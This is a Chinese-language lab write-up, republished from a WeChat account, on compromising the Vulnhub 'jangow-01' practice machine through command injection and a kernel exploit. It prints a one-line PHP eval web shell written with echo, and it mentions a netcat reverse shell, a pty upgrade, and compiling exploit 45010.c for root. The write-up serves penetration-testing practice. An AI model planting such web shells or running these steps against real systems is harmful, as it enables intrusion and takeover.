Vulnhub靶机练习笔记-jangow-01-1.0.1

admin 2023年7月29日14:38:20评论18 views字数 662阅读2分12秒阅读模式

靶机下载

https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova

靶场环境

NAT模式
kali:192.168.242.131
靶机:192.168.242.136

渗透测试

上来先信息收集(属于是肌肉记忆了)
nmap扫一波端口,只开放了21和80端口。Vulnhub靶机练习笔记-jangow-01-1.0.1

dirsearch爆破目录,发现.backup文件。Vulnhub靶机练习笔记-jangow-01-1.0.1

访问.backup,是个连接数据库的配置文件,直接拿到数据库账号密码(芜湖)。Vulnhub靶机练习笔记-jangow-01-1.0.1

用这个账号连ftp试试(连上了,但没什么有用的信息)Vulnhub靶机练习笔记-jangow-01-1.0.1

再回到80端口,点击BuscarVulnhub靶机练习笔记-jangow-01-1.0.1

在buscar传参处改为pwd,可以命令执行Vulnhub靶机练习笔记-jangow-01-1.0.1

利用echo写入一句话木马
echo '<?php eval($_POST["cmd"]);?>'>eval.phpVulnhub靶机练习笔记-jangow-01-1.0.1

ls查看,成功写入Vulnhub靶机练习笔记-jangow-01-1.0.1

蚁剑连接Vulnhub靶机练习笔记-jangow-01-1.0.1

写入shell.php反弹nc,这里只能反弹443端口Vulnhub靶机练习笔记-jangow-01-1.0.1

Vulnhub靶机练习笔记-jangow-01-1.0.1

访问shell.php触发反弹Vulnhub靶机练习笔记-jangow-01-1.0.1

Vulnhub靶机练习笔记-jangow-01-1.0.1

切换完整的交互式bash
python3 -c import pty;pty.spawn("/bin/bash")Vulnhub靶机练习笔记-jangow-01-1.0.1

提权

蚁剑打开终端,查看系统信息进行提权,内核版本是ubuntu16.04Vulnhub靶机练习笔记-jangow-01-1.0.1

searchsploit搜索ubuntu16.04,利用45010.c可提权Vulnhub靶机练习笔记-jangow-01-1.0.1

把45010.c的代码复制出来,使用蚁剑上传eval.cVulnhub靶机练习笔记-jangow-01-1.0.1

Vulnhub靶机练习笔记-jangow-01-1.0.1

gcc编译eva.c
ggc eval.c -o eval
给编译好的eval执行权限
chmod +x eval
执行eval提权,得到root权限Vulnhub靶机练习笔记-jangow-01-1.0.1

拿flag咯Vulnhub靶机练习笔记-jangow-01-1.0.1

原文始发于微信公众号(白帽子左一):Vulnhub靶机练习笔记-jangow-01-1.0.1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月29日14:38:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub靶机练习笔记-jangow-01-1.0.1http://cn-sec.com/archives/1916725.html

发表评论

匿名网友 填写信息